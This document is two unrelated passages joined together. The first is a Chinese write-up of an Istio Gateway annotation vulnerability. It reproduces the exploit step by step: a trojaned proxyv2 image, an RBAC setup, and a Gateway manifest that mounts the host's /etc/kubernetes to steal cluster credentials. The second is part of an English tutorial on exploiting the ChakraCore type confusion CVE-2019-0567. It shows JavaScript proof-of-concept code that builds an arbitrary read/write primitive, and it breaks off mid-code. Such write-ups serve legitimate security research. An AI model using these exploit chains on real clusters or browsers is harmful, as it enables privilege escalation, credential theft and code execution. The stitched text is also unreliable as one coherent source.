istio 可以通过用 namespace 打 label 的方法,自动给对应的 namespace 中运行的 pod 注入 sidecar 容器,而另一种方法则是在 pod 的 annotations 中手动的增加 sidecar.istio.io/inject: "true" 注解,当然还可以借助 istioctl kube-inject 对 yaml 手动进行注入,前两个功能都要归功于 kubernetes 动态准入控制的设计,它允许用户在不同的阶段对提交上来的资源进行修改和审查。

动态准入控制流程:

webhook

istiod 创建了 MutatingWebhook,并且一般对 namespace label 为 istio-injection: enabledsidecar.istio.io/inject != flase 的 pod 资源创建请求做 Mutaing webhook.

apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: istio-sidecar-injector
webhooks:
[...]
  namespaceSelector:
    matchExpressions:
    - key: istio-injection
      operator: In
      values:
      - enabled
  objectSelector:
    matchExpressions:
    - key: sidecar.istio.io/inject
      operator: NotIn
      values:
      - "false"
[...]
  rules:
  - apiGroups:
    - ""
    apiVersions:
    - v1
    operations:
    - CREATE
    resources:
    - pods
    scope: '*'
  sideEffects: None
  timeoutSeconds: 10

当我们提交一个创建符合规定的 pod 资源的操作时,istiod webhook 将会收到来自 k8s 动态准入控制器的请求,请求包含了 AdmissionReview 的资源,istiod 会对其中的 pod 资源的注解进行解析,在注入 sidecar 之前会使用 injectRequired (pkg/kube/inject/inject.go:169)函数对 pod 是否符合非 hostNetwork 、是否在默认忽略的 namespace 列表中还有是否在 annotation/label 中带有 sidecar.istio.io/inject 注解,如果 sidecar.istio.io/injecttrue 则注入 sidecar,另外一提 namepsace label 也能注入是因为 InjectionPolicy 默认为 Enabled

inject_code

了解完上面的条件后,接着分析注入 sidecar 具体操作的代码,具体实现位于 RunTemplate (pkg/kube/inject/inject.go:283)函数,前面的一些操作是合并 config 、做一些检查确保注解的规范及精简 pod struct,注意力放到位于templatePod 后的代码,利用 selectTemplates 函数提取出需要渲染的 templateNames 再经过 parseTemplate 进行渲染,详细的函数代码请看下方

template_render

获取注解 inject.istio.io/templates 中的值作为 templateName , params.pod.Annotations 数据类型是 map[string]string ,一般常见值为 sidecar 或者 gateway

func selectTemplates(params InjectionParameters) []string {
    // annotation.InjectTemplates.Name = inject.istio.io/templates
    if a, f := params.pod.Annotations[annotation.InjectTemplates.Name]; f {
        names := []string{}
        for _, tmplName := range strings.Split(a, ",") {
            name := strings.TrimSpace(tmplName)
            names = append(names, name)
        }
        return resolveAliases(params, names)
    }
    return resolveAliases(params, params.defaultTemplate)
}

使用 go template 模块来完成 yaml 文件的渲染

func parseTemplate(tmplStr string, funcMap map[string]interface{}, data SidecarTemplateData) (bytes.Buffer, error) {
    var tmpl bytes.Buffer
    temp := template.New("inject")
    t, err := temp.Funcs(sprig.TxtFuncMap()).Funcs(funcMap).Parse(tmplStr)
    if err != nil {
        log.Infof("Failed to parse template: %v %v\n", err, tmplStr)
        return bytes.Buffer{}, err
    }
    if err := t.Execute(&tmpl, &data); err != nil {
        log.Infof("Invalid template: %v %v\n", err, tmplStr)
        return bytes.Buffer{}, err
    }

    return tmpl, nil
}

那么这个 tmplStr 到底来自何方呢,实际上 istio 在初始化时将其存储在 configmap 中,我们可以通过运行 kubectl describe cm -n istio-system istio-sidecar-injector 来获取模版文件,sidecar 的模版有一些点非常值得注意,很多敏感值都是取自 annotation

template_1

template_2

有经验的研究者看到下面 userVolume 就可以猜到大概通过什么操作来完成攻击了。

sidecar.istio.io/proxyImage
sidecar.istio.io/userVolume
sidecar.istio.io/userVolumeMount

gateway deployment controller 注解传递

分析官方公告里的缓解建议,其中有一条就是将 PILOT_ENABLE_GATEWAY_API_DEPLOYMENT_CONTROLLER 环境变量置为 false ,然后结合另一条建议删除 gateways.gateway.networking.k8s.io 的 crd,所以大概率漏洞和创建 gateways 资源有关,翻了翻官方手册注意到了这句话如下图所示,Gateway 资源的注解将会传递到 ServiceDeployment 资源上。

istio_docs

有了传递这个细节,我们就能对得上漏洞利用的条件了,需要具备 gateways.gateway.networking.k8s.io 资源的 CREATE 权限,接着我们来分析一下 gateway 是如何传递 annotations 和 labels 的,其实大概也能想到还是利用 go template 对内置的 template 进行渲染,直接分析 configureIstioGateway 函数(pilot/pkg/config/kube/gateway/deploymentcontroller.go) ,其主要功能就是把 gateway 需要创建的 ServiceDeployment 按照 embed.FS 中的模版进行一个渲染,模版文件可以在(pilot/pkg/config/kube/gateway/templates/deployment.yaml)找到,分析模版文件也可以看到 template 中的 annotations 也是从上层的获取传递过来的注解。toYamlMap 可以将 maps 进行合并,注意观察 (strdict "inject.istio.io/templates" "gateway") 位于 .Annotations 前,所以这个点我们可以通过控制 gateway 的注解来覆盖 templates 值选择渲染的模版。

apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    {{ toYamlMap .Annotations | nindent 4 }}
  labels:
    {{ toYamlMap .Labels
      (strdict "gateway.istio.io/managed" "istio.io-gateway-controller")
      | nindent 4}}
  name: {{.Name}}
  namespace: {{.Namespace}}
  ownerReferences:
  - apiVersion: gateway.networking.k8s.io/v1alpha2
    kind: Gateway
    name: {{.Name}}
    uid: {{.UID}}
spec:
  selector:
    matchLabels:
      istio.io/gateway-name: {{.Name}}
  template:
    metadata:
      annotations:
        {{ toYamlMap
          (strdict "inject.istio.io/templates" "gateway")
          .Annotations
          | nindent 8}}
      labels:
        {{ toYamlMap
          (strdict "sidecar.istio.io/inject" "true")
          (strdict "istio.io/gateway-name" .Name)
          .Labels
          | nindent 8}}

漏洞利用

掌握了漏洞利用链路上的细节,我们就可以理出整个思路,创建精心构造过注解的 Gateway 资源及恶意的 proxyv2 镜像,“迷惑”控制器创建非预期的 pod 完成对 Host 主机上的敏感文件进行访问, 如 docker unix socket。

漏洞环境:

istio v1.12.2
kubernetes v1.20.14
kubernetes gateway-api v0.4.0
用下面的命令创建一个 write-only 的 角色,并初始化 istio

curl -L https://istio.io/downloadIstio | ISTIO_VERSION=1.12.2 TARGET_ARCH=x86_64 sh -
istioctl x precheck
istioctl install --set profile=demo -y
kubectl create namespace istio-ingress
kubectl create -f - << EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: gateways-only-create
rules:
- apiGroups: ["gateway.networking.k8s.io"]
  resources: ["gateways"]
  verbs: ["create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: test-gateways-only-create
subjects:
- kind: User
  name: test
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: gateways-only-create
  apiGroup: rbac.authorization.k8s.io
EOF

在利用漏洞之前,我们需要先制作一个恶意的 docker 镜像,我这里直接选择了 proxyv2 镜像作为目标镜像,替换其中的 /usr/local/bin/pilot-agent 为 bash 脚本,在 tag 一下 push 到本地的 registry 或者 docker.io 都可以。

docker run -it  --entrypoint /bin/sh istio/proxyv2:1.12.1
cp /usr/local/bin/pilot-agent /usr/local/bin/pilot-agent-orig
cat << EOF > /usr/local/bin/pilot-agent
#!/bin/bash

echo $1
if [ $1 != "istio-iptables" ]
then
    touch /tmp/test/pwned
    ls -lha /tmp/test/*
    cat /tmp/test/*
fi

/usr/local/bin/pilot-agent-orig $*
EOF
chmod +x /usr/local/bin/pilot-agent
exit
docker tag 0e87xxxxcc5c xxxx/proxyv2:malicious

commit 之前记得把 image 的 entrypoint 改为 /usr/local/bin/pilot-agent

接着利用下列的命令完成攻击,注意我覆盖了注解中的 inject.istio.io/templates 为 sidecar 使能让 k8s controller 在创建 pod 任务的时候,让其注解中的 inject.istio.io/templates 也为 sidecar,这样 istiod 的 inject webhook 就会按照 sidecar 的模版进行渲染 pod 资源文件, sidecar.istio.io/userVolumesidecar.istio.io/userVolumeMount 我这里挂载了 /etc/kubernetes 目录,为了和上面的恶意镜像相辅相成, POC 的效果就是直接打印出 Host 中 /etc/kubernetes 目录下的凭证及配置文件,利用 kubelet 的凭证或者 admin token 就可以提权完成接管整个集群,当然你也可以挂载 docker.sock 可以做到更完整的利用。

kubectl --as test create -f - << EOF
apiVersion: gateway.networking.k8s.io/v1alpha2
kind: Gateway
metadata:
  name: gateway
  namespace: istio-ingress
  annotations:
    inject.istio.io/templates: sidecar
    sidecar.istio.io/proxyImage: docker.io/shtesla/proxyv2:malicious
    sidecar.istio.io/userVolume: '[{"name":"kubernetes-dir","hostPath": {"path":"/etc/kubernetes","type":"Directory"}}]'
    sidecar.istio.io/userVolumeMount: '[{"mountPath":"/tmp/test","name":"kubernetes-dir"}]'
spec:
  gatewayClassName: istio
  listeners:
  - name: default
    hostname: "*.example.com"
    port: 80
    protocol: HTTP
    allowedRoutes:
      namespaces:
        from: All
EOF

创建完 Gateway 后 istiod inject webhook 也按照我们的要求创建了 pod

gateway_pod_yaml

docker_image

deployments 最终被渲染如下:

apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "1"
    inject.istio.io/templates: sidecar
    [...]
    sidecar.istio.io/proxyImage: docker.io/shtesla/proxyv2:malicious
    sidecar.istio.io/userVolume: '[{"name":"kubernetes-dir","hostPath": {"path":"/etc/kubernetes","type":"Directory"}}]'
    sidecar.istio.io/userVolumeMount: '[{"mountPath":"/tmp/test","name":"kubernetes-dir"}]'
  generation: 1
  labels:
    gateway.istio.io/managed: istio.io-gateway-controller
  name: gateway
  namespace: istio-ingress
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      istio.io/gateway-name: gateway
  strategy:
    rollingUpdate:
      maxSurge: 25%
      maxUnavailable: 25%
    type: RollingUpdate
  template:
    metadata:
      annotations:
        inject.istio.io/templates: sidecar
        [...]
        sidecar.istio.io/proxyImage: docker.io/shtesla/proxyv2:malicious
        sidecar.istio.io/userVolume: '[{"name":"kubernetes-dir","hostPath": {"path":"/etc/kubernetes","type":"Directory"}}]'
        sidecar.istio.io/userVolumeMount: '[{"mountPath":"/tmp/test","name":"kubernetes-dir"}]'
      creationTimestamp: null
      labels:
        istio.io/gateway-name: gateway
        sidecar.istio.io/inject: "true"
    spec:
      containers:
      - image: auto
        imagePullPolicy: Always
        name: istio-proxy
        ports:
        - containerPort: 15021
          name: status-port
          protocol: TCP
        readinessProbe:
          failureThreshold: 10
          httpGet:
            path: /healthz/ready
            port: 15021
            scheme: HTTP
          periodSeconds: 2
          successThreshold: 1
          timeoutSeconds: 2
        resources: {}
        securityContext:
          allowPrivilegeEscalation: true
          capabilities:
            add:
            - NET_BIND_SERVICE
            drop:
            - ALL
          readOnlyRootFilesystem: true
          runAsGroup: 1337
          runAsNonRoot: false
          runAsUser: 0
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30

攻击效果,成功在 /tmp/test 目录下挂载 kubernetes 目录,可以看到 apiserver 的凭据

pwned

总结

虽然 John Howard 与我友好沟通时,反复询问我这和用户直接创建 pod 有何区别?但我觉得整个利用过程也不失为一种新的特权提升的方法。

随着 kubernetes 各种新的 api 从 SIG 孵化出来以及更多新的云原生组件加入进来,在上下文传递的过程中难免会出现这种曲线救国权限溢出的漏洞,我觉得各种云原生的组件 controller 也可以作为重点的审计对象。

实战这个案例有用吗?要说完全能复现这个漏洞的利用过程我觉得是微乎其微的,除非在 infra 中可能会遇到这种场景,k8s 声明式的 api 配合海量组件 watch 资源的变化引入了无限的可能,或许实战中限定资源的读或者写就可以转化成特权提升漏洞。

参考:

  1. https://gateway-api.sigs.k8s.io/
  2. https://istio.io/latest/docs/reference/config/annotations/
  3. https://istio.io/latest/news/security/istio-security-2022-002/
  4. https://istio.io/latest/docs/tasks/traffic-management/ingress/gateway-api/

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 2)

16 March 2022 at 00:00

Introduction

In part one we went over setting up a ChakraCore exploit development environment, understanding how JavaScript (more specifically, the Chakra/ChakraCore engine) manages dynamic objects in memory, and vulnerability analysis of CVE-2019-0567 - a type confusion vulnerability that affects Chakra-based Microsoft Edge and ChakraCore. In this post, part two, we will pick up where we left off and begin by taking our proof-of-concept script, which “crashes” Edge and ChakraCore as a result of the type confusion vulnerability, and convert it into a read/write primtive. This primitive will then be used to gain code execution against ChakraCore and the ChakraCore shell, ch.exe, which essentially is a command-line JavaScript shell that allows execution of JavaScript. For our purposes, we can think of ch.exe as Microsoft Edge, but without the visuals. Then, in part three, we will port our exploit to Microsoft Edge to gain full code execution.

This post will also be dealing with ASLR, DEP, and Control Flow Guard (CFG) exploit mitigations. As we will see in part three, when we port our exploit to Edge, we will also have to deal with Arbitrary Code Guard (ACG). However, this mitigation isn’t enabled within ChakraCore - so we won’t have to deal with it within this blog post.

Lastly, before beginning this portion of the blog series, much of what is used in this blog post comes from Bruno Keith’s amazing work on this subject, as well as the Perception Point blog post on the “sister” vulnerability to CVE-2019-0567. With that being said, let’s go ahead and jump right into it!

ChakraCore/Chakra Exploit Primitives

Let’s recall the memory layout, from part one, of our dynamic object after the type confusion occurs.

As we can see above, we have overwritten the auxSlots pointer with a value we control, of 0x1234. Additionally, recall from part one of this blog series when we talked about JavaScript objects. A value in JavaScript is 64-bits (technically), but only 32-bits are used to hold the actual value (in the case of 0x1234, the value is represented in memory as 001000000001234. This is a result of “NaN boxing”, where JavaScript encodes type information in the upper 17-bits of the value. We also know that anything that isn’t a static object (generally speaking) is a dynamic object. We know that dynamic objects are “the exception to the rule”, and are actually represented in memory as a pointer. We saw this in part one by dissecting how dynamic objects are laid out in memory (e.g. object points to | vtable | type | auxSlots |).

What this means for our vulnerability is that we can overwrite the auxSlots pointer currently, but we can only overwrite it with a value that is NaN-boxed, meaning we can’t hijack the object with anything particularly interesting, as we are on a 64-bit machine but we can only overwrite the auxSlots pointer with a 32-bit value in our case, when using something like 0x1234.

The above is only a half truth, as we can use some “hacks” to actually end up controlling this auxSlots pointer with something interesting, actually with a “chain” of interesting items, to force ChakraCore to do something nefarious - which will eventually lead us to code execution.

Let’s update our proof-of-concept, which we will save as exploit.js, with the following JavaScript:

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);		// Instead of supplying 0x1234, we are supplying our obj
}

main();

Our exploit.js is slightly different than our original proof-of-concept. When the type confusion is exploited, we now are supplying obj instead of a value of 0x1234. In not so many words, the auxSlots pointer of our o object, previously overwritten with 0x1234 in part one, will now be overwritten with the address of our obj object. Here is where this gets interesting.

Recall that any object that isn’t NaN-boxed is considered a pointer. Since obj is a dynamic object, it is represented in memory as such:

What this means is that instead of our corrupted o object after the type confusion being laid out as such:

It will actually look like this in memory:

Our o object, who’s auxSlots pointer we can corrupt, now technically has a valid pointer in the auxSlots location within the object. However, we can clearly see that the o->auxSlots pointer isn’t pointing to an array of properties, it is actually pointing to the obj object which we created! Our exploit.js script essentially updates o->auxSlots to o->auxSlots = addressof(obj). This essentially means that o->auxSlots now contains the memory address of the obj object, instead of a valid auxSlots array address.

Recall also that we control the o properties, and can call them at any point in exploit.js via o.a, o.b, etc. For instance, if there was no type confusion vulnerability, and if we wanted to fetch the o.a property, we know this is how it would be done (considering o had been type transitioned to an auxSlots setup):

We know this to be the case, as we are well aware ChakraCore will dereference dynamic_object+0x10 to pull the auxSlots pointer. After retrieving the auxSlots pointer, ChakraCore will add the appropriate index to the auxSlots address to fetch a given property, such as o.a, which is stored at offset 0 or o.b, which is stored at offset 0x8. We saw this in part one of this blog series, and this is no different than how any other array stores and fetches an appropriate index.

What’s most interesting about all of this is that ChakraCore will still act on our o object as if the auxSlots pointer is still valid and hasn’t been corrupted. After all, this was the root cause of our vulnerability in part one. When we acted on o.a, after corrupting auxSlots to 0x1234, an access violation occurred, as 0x1234 is invalid memory.

This time, however, we have provided valid memory within o->auxSlots. So acting on o.a would actually take address is stored at auxSlots, dereference it, and then return the value stored at offset 0. Doing this currently, with our obj object being supplied as the auxSlots pointer for our corrupted o object, will actually return the vftable from our obj object. This is because the first 0x10 bytes of a dynamic object contain metadata, like vftable and type. Since ChakraCore is treating our obj as an auxSlots array, which can be indexed directly at an offset of 0, via auxSlots[0], we can actually interact with this metadata. This can be seen below.

Usually we can expect that the dereferenced contents of o+0x10, a.k.a. auxSlots, at an offset of 0, to contain the actual, raw value of o.a. After the type confusion vulnerability is used to corrupt auxSlots with a different address (the address of obj), whatever is stored at this address, at an offset of 0, is dereferenced and returned to whatever part of the JavaScript code is trying to retrieve the value of o.a. Since we have corrupted auxSlots with the address of an object, ChakraCore doesn’t know auxSlots is gone, and it will still gladly index whatever is at auxSlots[0] when the script tries to access the first property (in this case o.a), which is the vftable of our obj object. If we retrieved o.b, after our type confusion was executed, ChakraCore would fetch the type pointer.

Let’s inspect this in the debugger, to make more sense of this. Do not worry if this has yet to make sense. Recall from part one, the function chakracore!Js::DynamicTypeHandler::AdjustSlots is responsible for the type transition of our o property. Let’s set a breakpoint on our print() statement, as well as the aforementioned function so that we can examine the call stack to find the machine code (the JIT’d code) which corresponds to our opt() function. This is all information we learned in part one.

After opening ch.exe and passing in exploit.js as the argument (the script to be executed), we set a breakpoint on ch!WScriptJsrt::EchoCallback. After resuming execution and hitting the breakpoint, we then can set our intended breakpoint of chakracore!Js::DynamicTypeHandler::AdjustSlots.

When the chakracore!Js::DynamicTypeHandler::AdjustSlots is hit, we can examine the callstack (just like in part one) to identify our “JIT’d” opt() function

After retrieving the address of our opt() function, we can unassemble the code to set a breakpoint where our type confusion vulnerability reaches the apex - on the mov qword ptr [r15+10h], r11 instruction when auxSlots is overwritten.

We know that auxSlots is stored at o+0x10, so this means our o object is currently in R15. Let’s examine the object’s layout in memory, currently.

We can clearly see that this is the o object. Looking at the R11 register, which is the value that is going to corrupt auxSlots of o, we can see that it is the obj object we created earlier.

Notice what happens to the o object, as our vulnerability manifests. When o->auxSlots is corrupted, o.a now refers to the vftable property of our obj object.

Anytime we act on o.a, we will now be acting on the vftable of obj! This is great, but how can we take this further? Take not that the vftable is actually a user-mode address that resides within chakracore.dll. This means, if we were able to leak a vftable from an object, we would bypass ASLR. Let’s see how we can possibly do this.

DataView Objects

A popular object leveraged for exploitation is a DataView object. A DataView object provides users a way to read/write multiple different data types and endianness to and from a raw buffer in memory, which can be created with ArrayBuffer. This can include writing or retrieving an 8-byte, 16-byte, 32-byte, or (in some browsers) 64-bytes of raw data from said buffer. More information about DataView objects can be found here, for the more interested reader.

At a higher level a DataView object provides a set of methods that allow a developer to be very specific about the kind of data they would like to set, or retrieve, in a buffer created by ArrayBuffer. For instance, with the method getUint32(), provided by DataView, we can tell ChakraCore that we would like to retrieve the contents of the ArrayBuffer backing the DataView object as a 32-bit, unsigned data type, and even go as far as asking ChakraCore to return the value in little-endian format, and even specifying a specific offset within the buffer to read from. A list of methods provided by DataView can be found here.

The previous information provided makes a DataView object extremely attractive, from an exploitation perspective, as not only can we set and read data from a given buffer, we can specify the data type, offset, and even endianness. More on this in a bit.

Moving on, a DataView object could be instantiated as such below:

dataviewObj = new DataView(new ArrayBuffer(0x100));

This would essentially create a DataView object that is backed by a buffer, via ArrayBuffer.

This matters greatly to us because as of now if we want to overwrite auxSlots with something (referring to our vulnerability), it would either have to be a raw JavaScript value, like an integer, or the address of a dynamic object like the obj used previously. Even if we had some primitive to leak the base address of kernel32.dll, for instance, we could never actually corrupt the auxSlots pointer by directly overwriting it with the leaked address of 0x7fff5b3d0000 for instance, via our vulnerability. This is because of NaN-boxing - meaning if we try to directly overwrite the auxSlots pointer so that we can arbitrarily read or write from this address, ChakraCore would still “tag” this value, which would “mangle it” so that it no longer is represented in memory as 0x7fff5b3d0000. We can clearly see this if we first update exploit.js to the following and pause execution when auxSlots is corrupted:

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, 0x7fff5b3d0000);		// Instead of supplying 0x1234 or a fake object address, supply the base address of kernel32.dll
}

Using the same breakpoints and method for debugging, shown in the beginning of this blog, we can locate the JIT’d address of the opt() function and pause execution on the instruction responsible for overwriting auxSlots of the o object (in this case mov qword ptr [r15+10h], r13.

Notice how the value we supplied, originally 0x7fff5b3d0000 and was placed into the R13 register, has been totally mangled. This is because ChakraCore is embedding type information into the upper 17-bits of the 64-bit value (where only 32-bits technically are available to store a raw value). Obviously seeing this, we can’t directly set values for exploitation, as we need to be able to set and write 64-bit values at a time since we are exploiting a 64-bit system without having the address/value mangled. This means even if we can reliably leak data, we can’t write this leaked data to memory, as we have no way to avoid JavaScript NaN-boxing the value. This leaves us with the following choices:

  1. Write a NaN-boxed value to memory
  2. Write a dynamic object to memory (which is represented by a pointer)

If we chain together a few JavaScript objects, we can use the latter option shown above to corrupt a few things in memory with the addresses of objects to achieve a read/write primitive. Let’s start this process by examining how DataView objects behave in memory.

Let’s create a new JavaScript script named dataview.js:

// print() debug
print("DEBUG");

// Create a DataView object
dataviewObj = new DataView(new ArrayBuffer(0x100));

// Set data in the buffer
dataviewObj.setUint32(0x0, 0x41414141, true);	// Set, at an offset of 0 in the buffer, the value 0x41414141 and specify litte-endian (true)

Notice the level of control we have in respect to the amount of data, the type of data, and the offset of the data in the buffer we can set/retrieve.

In the above code we created a DataView object, which is backed by a raw memory buffer via ArrayBuffer. With the DataView “view” of this buffer, we can tell ChakraCore to start at the beginning of the buffer, use a 32-bit, unsigned data type, and use little endian format when setting the data 0x41414141 into the buffer created by ArrayBuffer. To see this in action, let’s execute this script in WinDbg.

Next, let’s set our print() debug breakpoint on ch!WScriptJsrt::EchoCallback. After resuming execution, let’s then set a breakpoint on chakracore!Js::DataView::EntrySetUint32, which is responsible for setting a value on a DataView buffer. Please note I was able to find this function by searching the ChakraCore code base, which is open-sourced and available on GitHub, within DataView.cpp, which looked to be responsible for setting values on DataView objects.

After hitting the breakpoint on chakracore!Js::DataView::EntrySetUint32, we can look further into the disassembly to see a method provided by DataView called SetValue(). Let’s set a breakpoint here.

After hitting the breakpoint, we can view the disassembly of this function below. We can see another call to a method called SetValue(). Let’s set a breakpoint on this function (please right click and open the below image in a new tab if you have trouble viewing).

After hitting the breakpoint, we can see the source of the SetValue() method function we are currently in, outlined in red below.

Cross-referencing this with the disassembly, we noticed right before the ret from this method function we see a mov dword ptr [rax], ecx instruction. This is an assembly operation which uses a 32-bit value to act on a 64-bit value. This is likely the operation which writes our 32-bit value to the buffer of the DataView object. We can confirm this by setting a breakpoint and verifying that, in fact, this is the responsible instruction.

We can see our buffer now holds 0x41414141.

This verifies that it is possible to set an arbitrary 32-bit value without any sort of NaN-boxing, via DataView objects. Also note the address of the buffer property of the DataView object, 0x157af16b2d0. However, what about a 64-bit value? Consider the following script below, which attempts to set one 64-bit value via offsets of DataView.

// print() debug
print("DEBUG");

// Create a DataView object
dataviewObj = new DataView(new ArrayBuffer(0x100));

// Set data in the buffer
dataviewObj.setUint32(0x0, 0x41414141, true);	// Set, at an offset of 0 in the buffer, the value 0x41414141 and specify litte-endian (true)
dataviewObj.setUint32(0x4, 0x41414141, true);	// Set, at an offset of 4 in the buffer, the value 0x41414141 and specify litte-endian (true)

Using the exact same methodology as before, we can return to our mov dword ptr [rax], rcx instruction which writes our data to a buffer to see that using DataView objects it is possible to set a value in JavaScript as a contiguous 64-bit value without NaN-boxing and without being restricted to just a JavaScript object address!

The only thing we are “limited” to is the fact we cannot set a 64-bit value in “one go”, and we must divide our writes/reads into two tries, since we can only read/write 32-bits at a time as a result of the methods provided to use by DataView. However, there is currently no way for us to abuse this functionality, as we can only perform these actions inside a buffer of a DataView object, which is not a security vulnerability. We will eventually see how we can use our type confusion vulnerability to achieve this, later in this blog post.

Lastly, we know how we can act on the DataView object, but how do we actually view the object in memory? Where does the buffer property of DataView come from, as we saw from our debugging? We can set a breakpoint on our original function, chakracore!Js::DataView::EntrySetUint32. When we hit this breakpoint, we then can set a breakpoint on the SetValue() function, at the end of the EntrySetUint32 function, which passes the pointer to the in-scope DataView object via RCX.

If we examine this value in WinDbg, we can clearly see this is our DataView object. Notice the object layout below - this is a dynamic object, but since it is a builtin JavaScript type, the layout is slightly different.

The most important thing for us to note is twofold: the vftable pointer still exists at the beginning of the object, and at offset 0x38 of the DataView object we have a pointer to the buffer. We can confirm this by setting a hardware breakpoint to pause execution anytime DataView.buffer is written to in a 4-byte (32-bit) boundary.

We now know where in a DataView object the buffer is stored, and can confirm how this buffer is written to, and in what manners can it be written to.

Let’s now chain this knowledge together with what we have previously accomplished to gain a read/write primitive.

Read/Write Primitive

Building upon our knowledge of DataView objects from the “DataView Objects” section and armed with our knowledge from the “Chakra/ChakraCore Exploit Primitives” section, where we saw how it would be possible to control the auxSlots pointer with an address of another JavaScript object we control in memory, let’s see how we can put these two together in order to achieve a read/write primitive.

Let’s recall two previous images, where we corrupted our o object’s auxSlots pointer with the address of another object, obj, in memory.

From the above images, we can see our current layout in memory, where o.a now controls the vftable of the obj object and o.b controls the type pointer of the obj object. But what if we had a property c within o (o.c)?

From the above image, we can clearly see that if there was a property c of o (o.c), it would therefore control the auxSlots pointer of the obj object, after the type confusion vulnerability. This essentially means that we can force obj to point to something else in memory. This is exactly what we would like to do in our case. We would like to do the exact same thing we did with the o object (corrupting the auxSlots pointer to point to another object in memory that we control). Here is how we would like this to look.

By setting o.c to a DataView object, we can control the entire contents of the DataView object by acting on the obj object! This is identical to the exact same scenario shown above where the auxSlots pointer was overwritten with the address of another object, but we saw we could fully control that object (vftable and all metadata) by acting on the corrupted object! This is because ChakraCore, again, still treats auxSlots as though it hasn’t been overwritten with another value. When we try to access obj.a in this case, ChakraCore fetches the auxSlots pointer stored at obj+0x10 and then tries to index that memory at an offset of 0. Since that is now another object in memory (in this case a DataView object), obj.a will still gladly fetch whatever is stored at an offset of 0, which is the vftable for our DataView object! This is also the reason we declared obj with so many values, as a DataView object has a few more hidden properties than a standard dynamic object. By decalring obj with many properties, it allows us access to all of the needed properties of the DataView object, since we aren’t stopping at dataview+0x10, like we have been with other objects since we only cared about the auxSlots pointers in those cases.

This is where things really start to pick up. We know that DataView.buffer is stored as a pointer. This can clearly be seen below by our previous investigative work on understanding DataView objects.

In the above image, we can see that DataView.buffer is stored at an offset of 0x38 within the DataView object. In the previous image, the buffer is a pointer in memory which points to the memory address 0x1a239afb2d0. This is the address of our buffer. Anytime we do dataview.setUint32() on our DataView object, this address will be updated with the contents. This can be seen below.

Knowing this, what if we were able to go from this:

To this:

What this would mean is that buffer address, previously shown above, would be corrupted with the base address of kernel32.dll. This means anytime we acted on our DataView object with a method such as setUint32() we would actually be overwriting the contents of kernel32.dll (note that there are obviously parts of a DLL that are read-only, read/write, or read/execute)! This is also known as an arbitrary write primitive! If we have the ability to leak data, we can obviously use our DataView object with the builtin methods to read and write from the corrupted buffer pointer, and we can obviously use our type confusion (as we have done by corrupted auxSlots pointers so far) to corrupt this buffer pointer with whatever memory address we want! The issue that remains, however, is the NaN-boxing dilemma.

As we can see in the above image, we can overwrite the buffer pointer of a DataView object by using the obj.h property. However, as we saw in JavaScript, if we try to set a value on an object such as obj.h = kernel32_base_address, our value will remain mangled. The only way we can get around this is through our DataView object, which can write raw 64-bit values.

The way we will actually address the above issue is to leverage two DataView objects! Here is how this will look in memory.

The above image may look confusing, so let’s break this down and also examine what we are seeing in the debugger.

This memory layout is no different than the others we have discussed. There is a type confusion vulnerability where the auxSlots pointer for our o object is actually the address of an obj object we control in memory. ChakraCore interprets this object as an auxSlots pointer, and we can use property o.c, which would be the third index into the auxSlots array had it not been corrupted. This entry in the auxSlots array is stored at auxSlots+0x10, and since auxSlots is really another object, this allows us to overwrite the auxSlots pointer of the obj object with a JavaScript object.

We overwrite the auxSlots array of the obj object we created, which has many properties. This is because obj->auxSlots was overwritten with a DataView object, which has many hidden properties, including a buffer property. Having obj declared with so many properties allows us to overwrite said hidden properties, such as the buffer pointer, which is stored at an offset of 0x38 within a DataView object. Since dataview1 is being interpreted as an auxSlots pointer, we can use obj (which previously would have been stored in this array) to have full access to overwrite any of the hidden properties of the dataview1 object. We want to set this buffer to an address we want to arbitrarily write to (like the stack for instance, to invoke a ROP chain). However, since JavaScript prevents us from setting obj.h with a raw 64-bit address, due to NaN-boxing, we have to overwrite this buffer with another JavaScript object address. Since DataView objects expose methods that can allow us to write a raw 64-bit value, we overwrite the buffer of the dataview1 object with the address of another DataView object.

Again, we opt for this method because we know obj.h is the property we could update which would overwrite dataview1->buffer. However, JavaScript won’t let us set a raw 64-bit value which we can use to read/write memory from to bypass ASLR and write to the stack and hijack control-flow. Because of this, we overwrite it with another DataView object.

Because dataview1->buffer = dataview2, we can now use the methods exposed by DataView (via our dataview1 object) to write to the dataview2 object’s buffer property with a raw 64-bit address! This is because methods like setUint32(), which we previously saw, allow us to do so! We also know that buffer is stored at an offset of 0x38 within a DataView object, so if we execute the following JavaScript, we can update dataview2->buffer to whatever raw 64-bit value we want to read/write from:

// Recall we can only set 32-bits at a time
// Start with 0x38 (dataview2->buffer and write 4 bytes
dataview1.setUint32(0x38, 0x41414141, true);		// Overwrite dataview2->buffer with 0x41414141

// Overwrite the next 4 bytes (0x3C offset into dataview2) to fully corrupt bytes 0x38-0x40 (the pointer for dataview2->buffer)
